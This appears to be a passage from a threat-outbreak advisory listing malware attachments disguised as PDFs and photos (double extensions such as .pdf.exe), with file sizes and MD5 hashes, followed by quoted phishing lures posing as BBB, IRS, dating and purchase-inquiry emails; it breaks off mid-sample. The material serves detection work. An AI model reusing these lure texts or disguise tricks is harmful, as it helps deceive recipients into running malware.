orders.pdf.zip \nlist of orders 02.pdf.exe \n_\n\nThe _Photo_P0809201181992884.jpg_____.exe_ file in the _photoq0857739080.zip_ has an approximate file size of 47,851 bytes. \n \nThe _quote.pdf.exe_ file has a file size of 575,100 bytes. The MD5 checksum, which is a unique identifier of the executable, is the following string: 0x0BEF712F82C5BBAA4850832088263165 \n \nA variant of the _quote.pdf.exe_ file in the _quote.pdf.zip_ attachment has a file size of 14,848 bytes. The MD5 checksum is the following string: 0x36F3A59898075BDB2107C061EB31F48B \n \nThe _case.report.pdf.exe_ file in the _54243162.pdf.zip_ attachment has a file size of 102,400 bytes. The MD5 checksum is the following string: 0x6CD6462C1B069D4C56D4B2DE2F2DF8DA \n \nThe _complaint209832982.pdf.exe_ file in the _Complaint209832982.zip_ attachment has a file size of 102,400 bytes. The MD5 checksum is the following string: 0x3451A73D24138895A905F5AD5FC412F6 \n \nThe _file389892.pdf.exe_ file in the __Complaint.zip__ attachment has a file size of 102,400 bytes. The MD5 checksum is the following string: 0xF772A927EB0C44207DB8EBDFDE8A4582 \n \nThe _report.pdf.exe_ file in the _Report.Id.30512437.zip_ attachment has a file size of 98,304 bytes. The MD5 checksum is the following string: 0x4D19CC20DC0FC6C66E3F295AA1F95DE6 \n \nThe _FAX_20121204_1929873988_27.pdf.exe_ file in the _FAX_20121204_1929873988_27.zip_ attachment has a file size of 98,304 bytes. The MD5 checksum is the following string: 0x572D45E2EC0CC595DE6458922B5CCB09 \n \nThe _FAX_20121204_1354584611_27.pdf.exe_ file in the _FAX_20121204_1354584611_27.zip_ attachment has a file size of 98,304 bytes. The MD5 checksum is the following string: 0xCB9250CB171CA666C03DFAEB6DC2A9B3 \n \nThe _Vodafone-MMS.jpeg.exe_ file size in the _Vodafone-MMS-ID74892.zip_ attachment is unavailable. The MD5 checksum is also unavailable. \n \nThe _Secure_Message.pdf.exe_ file in the _Secure_Message.zip_ attachment has a file size of 135,168 bytes. The MD5 checksum is the following string: 0x08AFCC89109E2897B195D5FA94ED3282 \n \nThe _Encrypted_Message.pdf.exe_ file in the _Encrypted_Message.zip_ attachment has a file size of 135,168 bytes. The MD5 checksum is the following string: 0x2EBA3CD9FA726812BD0F21DADD0F52DB \n \nThe _BBB_SBQ_Form_UID.pdf.exe_ file in the _rapidfax-08B72DF79DF7.zip_ attachment has a file size of 135,168 bytes. The MD5 checksum is the following string: 0x941FA4FDEFD1599FC5100BF113A0A2DA \n \nThe _JetstarFlightItinerary.pdf.exe_ file in the _REF 443367_JetstarFlightItinerary.pdf.zip_ attachment has a file size of 52,224 bytes. The MD5 checksum is the following string: 0x5B81EE9781192951DE0C30DF7593BE73 \n \nThe _BBB_Case.PDF.exe_ file in the _Case #BXX7U55DUY.zip_ attachment has a file size of 102,400 bytes. The MD5 checksum is the following string: 0xE741B17E0E7A27B81EAFA912A1FA2E55 \n \nA variant of the _report.pdf.exe_ file in the _BBB.COMPLAINT28162504.zip_ attachment has a file size of 102,400 bytes. The MD5 checksum is the following string: 0x3249250DB9DF75D1243939E6AFF6237D \n \nThe _Browser Settings for Internet Explorer 9.pdf..exe_ file in the _Browser Settings for Internet Explorer 9.pdf.zip_ attachment has a file size of 72,704 bytes. The MD5 checksum is the following string: 0xA72D7603A6B335F47CF65DEAFA99D405 \n \nThe _PDF-Ticketek-Purchase.pdf.exe_ file in the _Ticketek-Purchase-3221222430.zip_ attachment has a file size of 72,704 bytes. The MD5 checksum is the following string: 0x3C84FE0C00B149E8D2CA787DA7B79370 \n \nThe _97682473.PDF.R341.pdf.exe_ file in the _P-51480557.2340.pdf.zip_ attachment has an approximate file size of 24,709 bytes. The MD5 checksum is the following string: 0x503AE5B7BECF302F224B1A96AF592256 \n \nThe _AmericanExpress-Online-Services-Notification.pdf.exe_ file in the _AmericanExpress-Online-Services-Notification.zip_ attachment has a file size of 45,056 bytes. The MD5 checksum is the following string: 0x3436389F71E1CF2F230E5F361876C71C \n \nThe _your booking Qantas.pdf.exe_ file in the _your booking Qantas.zip_ attachment has a file size of 80,384 bytes. The MD5 checksum is the following string: 0x86DC6D01DC3F523B470D59E265AA9DCF \n \nThe _Turkcell Fatura Bildirimi.pdf.exe_ file in the _Turkcell Fatura Bildirimi.zip_ attachment has a file size of 80,384 bytes. The MD5 checksum is the following string: 0x3838AC0CFBF9E7A82BE16FADB471EE99 \n \nThe _DFFJ435DJ.JPG.exe_ file in the _ZLHAKJJE.zip_ attachment has a file size of 49,664 bytes. The MD5 checksum is the following string: 0x0C815B747C05C961EBBE9AD7B0A5A46A \n \nThe_ DH47SKK3.jpg.exe_ file in the _JESUEXNFJPG.zip_ attachment has an approximate file size of 38,696 bytes. The MD5 checksum is the following string: 0x05667cd8ca0f7e08fecf276d8bf72217 \n \nThe _Bilet_Alym_Onayy.pdf.exe_ file in the _Bilet_Alym_Onayy.pdf.zip_ attachment has an approximate file size of 38,533 bytes. The MD5 checksum is not available. \n \nThe _picture_FPO83G.jpeg.exe_ file in the _picture_{SYBOL}.zip_ attachment has a file size of 51,712 bytes. The MD5 checksum is the following string: 0x29085E824976A0128FB7DCD96564068E \n \nThe _IBF9570364.PDF.exe_ file size in the _IBF0565389.pdf.zip_ attachment is unavailable. The MD5 checksum is also unavailable. \n \nThe _EFATURA_8700934219.pdf.exe_ file in the _EFATURA_6604923009.zip_ attachment has an approximate file size of 40,960 bytes. The MD5 checksum is the following string: 0xE8A14C835492D8FA3CC561bFCDF905F7 \n \nThe _01-Fatura Bildirimi.PDF.exe_ file in the _Fatura Bildirimi-01f.zip_ attachment has an approximate file size of 35,850 bytes. The MD5 checksum is not available. \n \nThe _Bilet Alym Onayy.pdf.exe_ file size in the _Bilet Alym_Onayy.zip_ attachment is unavailable. The MD5 checksum is also unavailable. \n \nThe _PO040213RETECTLLORDER.pdf.exe_ file in the _PO040213RETECTLLORDER.pdf.zip_ attachment has a file size of 151,040 bytes. The MD5 checksum is the following string: 0x6C00BCB6C779301F44140F77C7822E50 \n \nThe _SunExpress-Bilet-Bilginiz.pdf.exe_ file in the _SunExpress-Bilet-Bilginiz.zip_ attachment has an approximate file size of 34,938 bytes. The MD5 checksum is not available. \n \nThe _MMS VodafoneID70091.jpg.exe_ file in the _MMS VodafoneID66349.zip_ attachment has a file size of 54,784 bytes. The MD5 checksum is the following string: 0x719F416465C1D8D641B715E7C0C390E6 \n \nThe _Digiturk-Fatura-6400422810.pdf.exe_ file in the _Digiturk-Fatura-2102347130.zip_ attachment has a file size of 54,784 bytes. The MD5 checksum is the following string: 0x00789609A8868E262FE2D2272CCFA0F8 \n \nThe _foto 849832.jpg.exe_ file in the _foto {SYBOL}.zip_ attachment has a file size of 59,239 bytes. The MD5 checksum is the following string: 0x67AB38D72A4BFCEE0DE34F067B28814E \n \nThe _picture 978063.jpg.exe_ file size in the _picture {SYBOL}.zip_ attachment is unavailable. The MD5 checksum is the following string: 0x67104CEC9B8B2A579704BA9DB03E8258 \n \nThe _Scan_02-13-2013.pdf.exe_ file in the _Scan_02-13-2013-7918386.zip_ attachment has a file size of 154,624 bytes. The MD5 checksum is the following string: 0x69F31B037AFE78C5CC14D3877D01F528 \n \nThe _report_13022012.pdf.exe _has a file size of 49,511 bytes. The MD5 checksum is the following string: 0x2F1A4A12D0CED524326D30F08A069AA4 \n \nThe _Myfax_MCFID_3784982639476284.pdf.exe_ file in the _Myfax_MCFID_3784982639476284.pdf.exe.zip_ attachment has a file size of 38,912 bytes. The MD5 checksum is the following string: 0x9250CB3E8645D9106FD369C7F56B7CCD \n \nA variant of _Scan_02-13-2013.pdf.exe_ file in the _Scan_02-13-2013-1677880.zip_ attachment has a file size of 154,624 bytes. The MD5 checksum is the following string: 0xB1096A1A961FAE04DE84D4EE628D447A \n \nThe _Turkcell_65800954386-000678543.pdf.exe_ file in the _Aaaaaaaa_0000000000-000000000.zip_ attachment has a file size of 57,703 bytes. The MD5 checksum is the following string: 0xE126A7EA3FABA587B03E88E52372F965 \n \nThe _QANTAS7769043.pdf.exe_ file in the _QANTAS0470881.zip_ attachment has a file size of 56,167 bytes. The MD5 checksum is the following string: 0x8D5360A01C72ACEC803736B2FF5F25AF \n \nThe _FuelCard-ebill7640027.PDF.exe_ file in the _FuelCard-ebill6542151.PDF.zip_ attachment has a file size of 31,236 bytes. The MD5 checksum is the following string: 0x86FC891B3A41D4BC8FD599A572E2460B \n \nThe _FuelCard-ebill7599300.PDF.exe_ file in the _FuelCard-ebill5297077.PDF.zip_ attachment has a file size of 27,140 bytes. The MD5 checksum is the following string: 0xC2E02E48E8205B8448680EBF28DCD4FB \n \nThe _fedach_rprt_030413.PDF.exe_ file has a file size of 157,696 bytes. The MD5 checksum is the following string: 0x37E587B7ABC643E3E8604CBBC7F8F70D \n \nThe _adp_invoice_userID.pdf.exe_ file in the _ADP_Invoice-66D8D15FFA.zip_ attachment has a file size of 115,712 bytes. The MD5 checksum is the following string: 0xBFE7C4846823174CBCBB10DE9DAF426B \n \nThe _0784_415.pdf.exe_ file in the _0784_415.pdf.zip_ attachment has a file size of 134,144 bytes. The MD5 checksum is the following string: 0xA8A0B31D4CC3AC0887732220085EFDB2 \n \nThe _ReservationFJRU7FJ3883.pdf.exe_ file in the _ReservationSYMBOL[7]}661.zip_ attachment has a file size of 30,724 bytes. The MD5 checksum is the following string: 0x2C1A7509B389858310FFBC72EE64D501 \n \nThe _AtlanticHotel Booking Confirmation.doc.exe_ file in the _AtlanticHotel Booking Confirmation.zip_ attachment has a file size of 31,236 bytes. The MD5 checksum is the following string: 0x436B39675D6244A82C34DCE08C22B4C5 \n \nThe _Flugladen_de Buchungsbedingungen.pdf.exe_ file in the _Flugladen_de Buchungsbedingungen.pdf.zip_ attachment has a file size of 30724 bytes. The MD5 checksum is the following string: 0xCF6F1FB2E43AA209D7941118B4B5AE68 \n \nThe _Travel Details - Itinerary.pdf.exe_ file in the _Travel Details - Itinerary.zip_ attachment has a file size of 53,119 bytes. The MD5 checksum is the following string: 0x3BC79F4EB80D8E728609F41297683FDB \n \nThe _ADP-Invoice-000FF.pdf.exe_ file in the _ADP-Invoice-1B92F16FB6.zip_ attachment has a file size of 114,176 bytes. The MD5 checksum is the following string: 0x3778255CD02AE8A15CF9331B99A67A2B \n \nThe _86486784-f.jpeg.exe_ file in the _40333513_{abcbig}.zip_ attachment has a file size of 35,191 bytes. The MD5 checksum is the following string: 0x7186FF3A228BB1EB24D6BB052A410A4B \n \nThe _BBB_ComplaintReport_N89372947.doc.exe_ file in the _Complaint_Vj462943496.zip_ attachment has a file size of 119,808 bytes. The MD5 checksum is the following string: 0x872E1F9000B4E852723CB3263A65F1A5 \n \nThe _Order_N9923704028.doc.exe_ file in the _Aaaaa_A0000000.zip_ attachment has a file size of 128,000 bytes. The MD5 checksum is the following string: 0x97C9C3B4D50171A07305F91C1885EF9F \n \nThe _CTP Green Slip Quote.pdf.exe_ file in the _CTP Green Slip Quote.zip_ attachment has no file size and MD5 checksum. \n \nThe _TNT-NL-765593094-855874003-factuur.PDF.exe_ file in the _TNT-NL-016891790-710354467-factuur.zip_ attachment has a file size of 77,824 bytes. The MD5 checksum is the following string: 0xDD11492D246E97D341470D6C9C4DE619 \n \nThe _Cover-More Travel Insurance.PDF.exe_ file in the _Cover-More Travel Insurance.zip_ attachment has a file size of 237,568 bytes. The MD5 checksum is the following string: 0x5068EA2478FC85FEAC77A65E4AA69A70 \n \nThe _MMS - KKLIFJBG5.JPEG.exe_ file in the _MMS - 5HUAMVQ9.zip_ attachment has a file size of 207,360 bytes. The MD5 checksum is the following string: 0x09FE7B078E2F2F201FA9F627BCFB88BA \n \nThe _Document.exe_ file in the _Bank Invoice Docs.pdf.zip_ attachment has a file size of 3,436,544 bytes. The MD5 checksum is the following string: 0x74EC6A4FFBB7491CC2307FBE756AA304 \n \nThe _MMS - SD4AW3O0.jpg.exe_ file in the _MMS - 4LFT77VQ.zip_ attachment has a file size of 135,168 bytes. The MD5 checksum is the following string: 0x5A49A9C0CE40BB591879F38F9226B1E1 \n \nThe_ FedEx Shipment Notification.pdf.exe_ file in the _FedEx Shipment Notification.zip_ attachment has a file size of 89,088 bytes. The MD5 checksum is the following string: 0xD302958B81311723EF8BC5206B11CB5D \n \nThe _nice surprise.jpg.exe_ file in the _nice_surprise.jpg.zip_ attachment has a file size of 348,160 bytes. The MD5 checksum is the following string: 0x86E203B70EBB4FD64C3F538BCC196FEC \n \nThe _MMS_Message 88740922.bmp.exe_ file in the _MMS_Message 14632411.zip_ attachment has a file size of 71,680 bytes. The MD5 checksum is the following string: 0xD55F732CC41EAADCA1C58B4C3D07E431 \n \nThe _847590FJT65784.jpeg.img.exe_ file in the _617100R737958.zip_ attachment has a file size of 33,272 bytes. The MD5 checksum is the following string: 0x342408250CB23B9335872AC5F4256D67 \n \nThe _report0743696.PDF.exe_ file has a file size of 143,360 bytes. The MD5 checksum is the following string: 0x9DBE1C8F8CF62E50FE57D6D312F8FBFF \n \nThe _faktura_VAT_03_06_2013.PDF.scr_ file has a file size of 462,848 bytes. The MD5 checksum is the following string: 0x4138E67B6F22327944618138C5DF3A72 \n \nThe _img-message_ 0987956404.jpeg.exe_ file in the_ img 6267577318.zip_ attachment has a file size of 54,776 bytes. The MD5 checksum is the following string: 0xECF39DBE0B7FF6ED07E71FE3B53441B6 \n \nThe _Ihre_O2_Bestellung-8750058433.PDF.exe_ file in the _Ihre_O2_Bestellung-0959708715.zip_ attachment has a file size of 82,936 bytes. The MD5 checksum is the following string: 0xBDDA3E138705F7A09C973810FE492738 \n \nThe _image_9475683947534.jpeg.exe_ file in the _image_085265097172.zip_ attachment has a file size of 307,200 bytes. The MD5 checksum, which is a unique identifier of the executable, is the following string: 0xC4512E3DB50709C9503A8200743DFD5B \n \nThe_ Report_07340184.pdf.exe_ file has a file size of 139,776 bytes. The MD5 checksum, which is a unique identifier of the executable, is the following string: 0x83C842B635DFD3136BEEA7B6DB5F9C91 \n \nThe _Report_313342.pdf.exe_ file has a file size of 87,040 bytes. The MD5 checksum is the following string: 0x0C387A1CAAEF48124FB093B056A04F73 \n \nThe _Report_00340184.pdf.exe_ file has a file size of 111,104 bytes. The MD5 checksum is the following string: 0x36D9B97F96055C555A608C6B66F91EF7 \n \nThe _Fax details and transmission_report.doc.exe_ file in the _Fax details and transmission_report.zip_ attachment has a file size of 89,088 bytes. The MD5 checksum is the following string: 0x66140A32D7D8047EA93DE0A4A419880B \n \nThe _Pic_JGYTHGD756EJFH90.jpg.exe_ file in the _Pic_THYL3DKHHH0.zip_ attachment has a file size of 240,640 bytes. The MD5 checksum is the following string: 0xA968F26D452B34696778014DC3758D30 \n \nA variant of the _Report_07340184.pdf.exe_ file has a file size of 148,480 bytes. The MD5 checksum is the following string: 0xF0F760C912F6C4091A039FB9AD8A2BCB \n \nThe _IncomingFax.pdf.exe_ file has a file size of 113,664 bytes. The MD5 checksum is the following string: 0xE4E4A310CB14AE0861308ABEAF88CFC6 \n \nThe _Wellsfargo_SecuredMessage-06.11.2013.pdf.exe_ file in the _WellsFargo.reportphishing.zip_ attachment has a file size of 88,576 bytes. The MD5 checksum is the following string: 0xB8059FF6EDC17E0120DFFE65FD6B5A4A \n \nThe _secure.pdf.exe_ file in the _secure.pdf.zip_ attachment has a file size of 114,176 bytes. The MD5 checksum is the following string: 0x4209430A3393287D5E28DEF88E43B93B \n \nThe _image DRJT4D45AS.jpeg.exe_ file in the _image LP5CWV67HV.zip_ attachment has a file size of 103,416 bytes. The MD5 checksum is the following string: 0xDEF1DF9347CAF287EB24277A23782568 \n \nThe _Order Items.pdf.scr_ file in the _Order Items.pdf.zip_ attachment has a file size of 242,176 bytes. The MD5 checksum is the following string: 0x62081FBC143F5CC1F23C93D21AF579C0 \n \nThe _Valuation.pdf.scr_ file has a file size of 700,364 bytes. The MD5 checksum is the following string: 0xC862DFD89F06D6CA14E4E62FCEA2165A \n \nThe __7654865S9876Y_.jpeg.exe_ file in the __G7EEYCJBD5EQ.zip_ attachment has a file size of 27,648 bytes. The MD5 checksum is the following string: 0xA2939D5C3DD68CE508BFAD1E78569B7D \n \nThe _MMS ID FJSU754F2.jpeg.exe_ file in the _MMS Id BQ6ZDUSZ.zip_ attachment has a file size of 27,648 bytes. The MD5 checksum is the following string: 0x9B59C5296830F80BD2C043E348C8DA07 \n \nThe _Booking-order form1.pdf.exe_ file in the _Booking-order form1.zip_ attachment has a file size of 27,136 bytes. The MD5 checksum is the following string: 0x4CBC7969F421E876B4EC01EF3CC77A83 \n \nThe _CTP Green Slip Quote.PDF.exe_ file in the _CTP Green Slip Quote.zip_ attachment has a file size of 28,160 bytes. The MD5 checksum is the following string: 0xFF208BF01E822721F8E620D9ACA4F364 \n \nThe _e-Billing_factuur08654.pdf.exe_ file in the _e-Billing_factuur.zip_ attachment has a file size of 29,696 bytes. The MD5 checksum is the following string: 0xCCF8830ECB09D596C7101EBDCF79E7D3 \n \nThe _Report_07344982.pdf.exe_ file has a file size of 117,248 bytes. The MD5 checksum is the following string: 0x4FECBBE7F992BA887BB701D884B6F0F0 \n \nA variant of the _Order Items.pdf.scr_ file in the _Order Items.pdf.zip_ attachment has a file size of 896,114 bytes. The MD5 checksum is the following string: 0x9B39C12534422F2428B99342FE80CF6C \n \nThe _VOUCHER_PRINT.DOC .exe_ file in the _VOUCHER_PRINT.zip_ attachment has a file size of 27,136 bytes. The MD5 checksum is the following string: 0x9E0EA9372FB79648D59ACCCAC55C3F45 \n \nThe _0617487592.doc.exe_ file in the __5863222179.zip_ attachment has a file size of 27,136 bytes. The MD5 checksum is the following string: 0x619258051E51973EE262EFB5EE9812F4 \n \nThe _85700433_0000000000_X_20130628_I_13_7750.pdf.exe_ file in the _32907382_0000000000_K_20130628_I_13_1867.zip_ attachment has a file size of 27,136 bytes. The MD5 checksum is the following string: 0x563E3E157886952877859A19195A4E57 \n \nThe _SCAN_HP_Digital_06192013.pdf.exe_ file in the _SCAN_HP_Digital_06192013.zip_ attachment has a file size of 123,392 bytes. The MD5 checksum is the following string: 0x963BCA0BE4C9AD74ADD6FF29438FEF62 \n \nThe _cstapleton_Invoice.pdf.exe_ file in the _cstapleton_Invoice.zip_ attachment has a file size of 123,904 bytes. The MD5 checksum is the following string: 0xE2305AAAA7B8539C7076C1C57F6A0CCB \n \nThe _PostNL_GJ88T995305.PDF.exe_ file in the _PostNL_P87UV489066.zip_ attachment has a file size of 26,112 bytes. The MD5 checksum is the following string: 0xA3FCAF1B0993DBEB87FE03A3D413BD05 \n \nThe _MIAP511I_5329142_0001934810_ST493.PDF.exe_ file in the _MIAP511I_5329142_0001934810_ST493.zip_ attachment has a file size of 133,632 bytes. The MD5 checksum is the following string: 0x0BE2C0F318159A87FA1A27E84A224AD7 \n \nThe _Certificate 9850038.pdf.exe_ file in the _Certificate 6082047.zip_ attachment has a file size of 66,181 bytes. The MD5 checksum is the following string: 0x7EED403CFD09EA301C4E10BA5ED5148A \n \nThe _SCAN_HP_Digital_03859274.pdf.exe_ file in the _SCAN_HP_Digital_03859274.zip_ attachment has a file size of 118,784 bytes. The MD5 checksum is the following string: 0xB2C2C5CBF168F8B77F1F397FAC5E1274 \n \nThe _Photo 11.07.2013 _0684468490.jpg.exe_ file in the _Photo 11.07.2013 _8689993630.zip_ attachment has a file size of 57,344 bytes. The MD5 checksum is the following string: 0xAEC4D9E64A5B4BA241E8E8040B12D1E0 \n \nThe _HP Digital_001-4824329846923647496593278456932409569237498723498543569324690582374895.pdf.exe_ file in the _SCAN_HP_Digital_07_11_2013.zip_ attachment has a file size of 119,808 bytes. The MD5 checksum is the following string: 0x6C8FBDD71C383895435C6B9876BF0AE3 \n \nThe _samplepix134.PDF.exe_ file in the _samplepix134.PDF.zip_ attachment has a file size of 367,616 bytes. The MD5 checksum is the following string: 0xA636DF0DC5BA5C254CBF6DF8C094067C \n \nThe _Microsoft HUP - Ihren Produkt Key.PDF.exe_ file in the _Microsoft HUP - Ihren Produkt Key.zip_ attachment has a file size of 126,976 bytes. The MD5 checksum is the following string: 0x3A92850B33D14AFEC3D25071BB501357 \n \nThe_ IdentityForm.PDF.exe_ file in the _IdentityForm.zip _attachment has a file size of 128,512 bytes. The MD5 checksum is the following string: 0xD69BC5FEC7BE769AD53428FF4835B8F3 \n \nThe _Image 16.07.2013. 1999486300.jpeg.exe_ file in the _Image 16.07.2013. 0431813230.zip_ attachment has a file size of 50,176 bytes. The MD5 checksum is the following string: 0xA0D434F7B571DC4601F8C945A3AA38AF \n \nThe _Photo _ 17.07.2013_ ID9775002633.jpeg.exe_ file in the _Photo _ 17.07.2013_ ID4847412983.zip_ attachment has a file size of 79,512 bytes. The MD5 checksum is the following string: 0xA6D8DD5184301AC43290EC2684CFEAA5 \n \nThe _Photo _ 19.07.2013_ ID0482661958.jpg.exe_ file in the _Photo _ 19.07.2013_ ID0482661958.zip_ attachment has a file size of 122,880 bytes. The MD5 checksum is the following string: 0x10D0AF834EE36FBAF1B6DBD7508377A2 \n \nThe _mms_data_21-07-2013_911106338.gif.exe_ file in the _mms_data_21-07-2013_99039884.zip_ attachment has a file size of 73,731 bytes. The MD5 checksum is the following string: 0x6AEACB54D57CDDFF1B1B39D2D3B32140 \n \nThe _Docs_22072013_PDF.PDF.exe _file in the _Docs_sturtzs.com.zip_ attachment has a file size of 130,560 bytes. The MD5 checksum is the following string: 0x95B542B1BCBD7D5AEE65F97E9125D90C \n \nThe _Photo_22_07_2013_ID659376522.jpeg.exe_ file in the _Photo_22_07_2013_ID659376522.jpeg.zip_ attachment has a file size of 130,560 bytes. The MD5 checksum is the following string: 0xEC23400949235A97725212433450AA98 \n \nThe _Facebook_Album Image_650032.jpeg_ file in the _Facebook_Album Image_451600.zip_ attachment has a file size of 310,272 bytes. The MD5 checksum is the following string: 0xCC10159898E731C784153897021E29F5 \n \nThe _fraudulent-report.html.749022.html.exe_ file in the _fraudulent-report.html.zip_ attachment has a file size of 64,152 bytes. The MD5 checksum is the following string: 0x3965D6F027812306EA953DBD0AC0BCE0 \n \nThe _Nachricht zu Ihrem DPD Paket.PDF.exe_ file in the _Nachricht zu Ihrem DPD Paket.zip_ attachment has a file size of 71,320 bytes. The MD5 checksum is the following string: 0xDC072E30A4744830FE1768B548580781 \n \nThe _data_mms_23-07-2013_98500042.gif.exe _file in the _data_mms_23-07-2013_84221132.zip_ attachment has a file size of 86,528 bytes. The MD5 checksum is the following string: 0x2D45933FEC589B9966EA70645354E5C8 \n \nThe _mms data_23-07-2013_09548811.jpeg.exe_ file in the _mms data 23.07,2013_09548811.zip _attachment has a file size of 86,528 bytes. The MD5 checksum is the following string: 0x47209A54799467B13E70BCD27E7ED6E2 \n \nThe _Send qoute.pdf.exe_ file in the _Send qoute.pdf.zip _attachment has a file size of 1,152,228 bytes. The MD5 checksum is the following string: 0x17535E548F2C1A5C665099B0E5BF3798 \n \nThe _flight document upgrade.doc.exe_ file in the _flight document upgrade.doc.zip_ attachment has a file size of 304,128 bytes. The MD5 checksum is the following string: 0x06D5EFBD2A5E5ED1115F15236BA76751 \n \nA variant of the _Nachricht zu Ihrem DPD Paket.pdf.exe_ file in the _Nachricht zu Ihrem DPD Paket.zip_ attachment has a file size of 98,304 bytes. The MD5 checksum is the following string: 0x2E078D65E429C29A86CD0CF3D243B5C9 \n \nThe _order.xls.exe_ attachment has a file size of 1,515,580 bytes. The MD5 checksum is the following string: 0xB5DDC0681E76C8A3A6475874D33944F3 \n \nThe _Invoice # AUG 12.PDF.exe_ file in the _Invoice # AUG 12.zip_ attachment has a file size of 461,312 bytes. The MD5 checksum is the following string: 0xC3A3478570421D21D5949314BCD1503D \n \nThe _Order Western Union Online FX 70059.pdf.exe_ file in the _Order Western Union Online FX 86364.zip_ attachment has a file size of 112,684 bytes. The MD5 checksum is the following string: 0x948FD2EA728F38886DF824AA2BB7FD3A \n \nThe _job27598-1.inv100128.sc-01.pdf.exe_ file in the _job27598-1.inv100128.sc-01.zip_ attachment has a file size of 442,368 bytes. The MD5 checksum is the following string: 0x9360FF25C1A1B84BA9EF00150A89A320 \n \nThe _RG859095867466.pdf.exe_ file in the _RG679921651994.zip_ attachment has a file size of 111,616 bytes. The MD5 checksum is the following string: 0x5434EB8E4D620732FC3DF72902C91810 \n \nThe _vodafone.it_AreaPrivati_Codice.pdf.exe_ file in the _vodafone.it_AreaPrivati_Codice.zip_ attachment has a file size of 288,256 bytes. The MD5 checksum is the following string: 0x8D41F9103E9C0C751A5FB81965F6589F \n \nThe _list of orders 02.pdf.exe_ file in the _list of orders.pdf.zip_ attachment has a file size of 896,512 bytes. The MD5 checksum is the following string: 0x3A7769F7790AA853F1B869571ABF2AEF \n \nThe following text is a sample of the email message that is associated with this threat outbreak: \n\n> Subject: **How are you kitten? I miss your caress and gentle touch.** \n \nMessage Body: \n \n**You are currently registered as: asianloveline. com \n\\- Age: 26 \n\\- Neme: Josie \n\\- Seeking: A Female. Group 18-99 \n\\- Status: ONLINE \n\\- Service: asianloveline. com 6286 Girls Currently Online \n\\- Fotos: 8 fotos in attached file. \n\\- Title: \"im looking for sex 1on1 \nPeople say I have a very pretty face and also a killer body... but my sweet cherry pie is really what is good! I get along best with people who are al... \"**\n\nOr \n\n> Message Body: \n \n**Dear Sir/Madam \nWe are a Philippine trading company specializes in buying and supplies of various goods and materials for our numerous customers all over Asia and \nNorth Africa. \nPresently we have a bulk demand of this specific attached products and will want you to check if you have the capacity to supply and more importantly the quality and specifications as you can also view from the attachment. \nPlease view the list attached and confirm if your company can produce and what is the delivery time. \nYour cooperation is highly anticipated.Thank as we wait for your reply. \nRegards \nJENNIFER LABECH \nThe Purchasing Manager/International TRADE DEPARTMENT \nLABECH TRADING COMPANY LTD \nAddress: 3M Main Office \n9th Floor, Three World Square Building \n# 22 Upper McKinley Road \nMcKinley Hill, Fort Bonifacio \nPhone/fax +63-4563765 \nTaguig City 1634 \nPhilippines**\n\nOr \n\n> Subject: **Fwd: PRICE LIST NEEDED** \n \nMessage Body: \n \n**Please quote best price for items attached. If possible a catalogue. I will await your email. \nRegards \nPeter Black. \nPurchasing Manger \nSears Holdings Corporation \n3333 Beverly Road Hoffman Estates, IL 60179 \nPhone: +1 (847) 286-2500 \nToll free: 1-800-3494358 \nEmai: xxxxxx@xxxxxx.comWebsite: www.sears.com \n \n**\n\nOr \n\n****\n\n> > Subject: **BBB Complaint activity report** \n \nMessage Body:** \n \nBetter Business Bureau\u00ae \nStart With Trust\u00ae \nbbb \nSat, 01 Dec 2012 01:13:20 +1000 \nRE: Case #54243162 \nHello Sirs, \nThe Better Business Bureau has got the above mentioned complaint from one of your clients on the subject of their dealings with you. The detailed information about the consumer's concern is contained in attached document. Please give attention to this question and notify us of your opinion as soon as possible. We encourage you to open the COMPLAINT REPORT to respond on this complaint. \nATTACHED REPORT: 54243162.pdf.zip \nWe are looking forward to your urgent attention to this matter. \nSincerely, \nWim Mclugaish \nDispute Counselor \nBetter Business Bureau \nCouncil of Better Business Bureaus \n3033 Wilson Blvd, Suite 600 Arlington, VA 22201 \nPhone: 1 (703) 276.0100 Fax: 1 (703) 525.8277 \nThis message was sent to calvelodd@ieighty.net.**\n\nOr \n\n> Subject: **Complaint Case #99189639** \n \nMessage Body: \n \n**Internal Revenue Service \nYou have received a complaint in regards to your business services. The complaint was filled by Mr./Mrs. Borromeo FIGUERON on 11/29/2012/ \nCase Number: 885030804500 \nInstructions on how to resolve this complaint as well as a copy of the original complaint are attached to this email. \nDisputes involving consumer products and/or services may be arbitrated. Unless they directly relate to the contract that is the basis of this dispute, the following claims will be considered for arbitration only if all parties agree in writing that the arbitrator may consider them: Claims based on product liability; Claims for personal injuries; Claims that have been resolved by a previous court action, arbitration, or written agreement between the parties. \nThe decision as to whether your dispute or any part of it can be arbitrated rests solely with the IRS. \nThe IRS offers a binding arbitration service for disputes involving marketplace transactions. Arbitration is a convenient, civilized way to settle disputes quickly and fairly, without the costs associated with other legal options. \n2012 Council of IRS, Inc. All Rights Reserved. \n2001 IRS.gov**\n\nOr \n\n> Subject: **Complaint Case #95305466** \n \nMessage Body: \n \n**Internal Revenue Service \nYou have received a complaint in regards to your business services. The complaint was filled by Mr./Mrs. Afrodisio LAURIAS on 11/29/2012/ \nCase Number: 928862424980 \nInstructions on how to resolve this complaint as well as a copy of the original complaint are attached to this email. \nDisputes involving consumer products and/or services may be arbitrated. Unless they directly relate to the contract that is the basis of this dispute, the following claims will be considered for arbitration only if all parties agree in writing that the arbitrator may consider them: Claims based on product liability; Claims for personal injuries; Claims that have been resolved by a previous court action, arbitration, or written agreement between the parties. \nThe decision as to whether your dispute or any part of it can be arbitrated rests solely with the IRS. \nThe IRS offers a binding arbitration service for disputes involving marketplace transactions. Arbitration is a convenient, civilized way to settle disputes quickly and fairly, without the costs associated with other legal options. \n2012 Council of IRS, Inc. All Rights Reserved. \n2001 IRS.gov **\n\nOr \n\n> Subject: **Your customer\u2019s concern** \n \nMessage Body: \n \n**Better Business Bureau\u00ae \nStart With Trust\u00ae \nbbb \nWed, 05 Dec 2012 01:29:27 +1200 \nRE: Case #30512437 \nHello, \nThe Better Business Bureau has got the above mentioned complaint from one of your customers concerning their business relations with you. The detailed information about the consumer's concern is presented in attached file. Please give attention to this problem and inform us about your opinion as soon as possible. We kindly ask you to open the ATTACHED REPORT to find the details on this complaint. \nATTACHED REPORT: Report.Id.30512437.zip \nWe look forward to your urgent response. \nFaithfully yours, \nWiebke Dechelette \nDispute Counselor \nBetter Business Bureau \nBetter Business Bureau \n3033 Wilson Blvd, Suite 600 Arlington, VA 22201 \nPhone: 1 (703) 276.0100 Fax: 1 (703) 525.8277 \nThis message was sent to mandd@netsight.net.**\n\nOr \n\n> Subject: **Corporate eFax message from \"443-665-3967\" - 17 page(s)** \n \nMessage 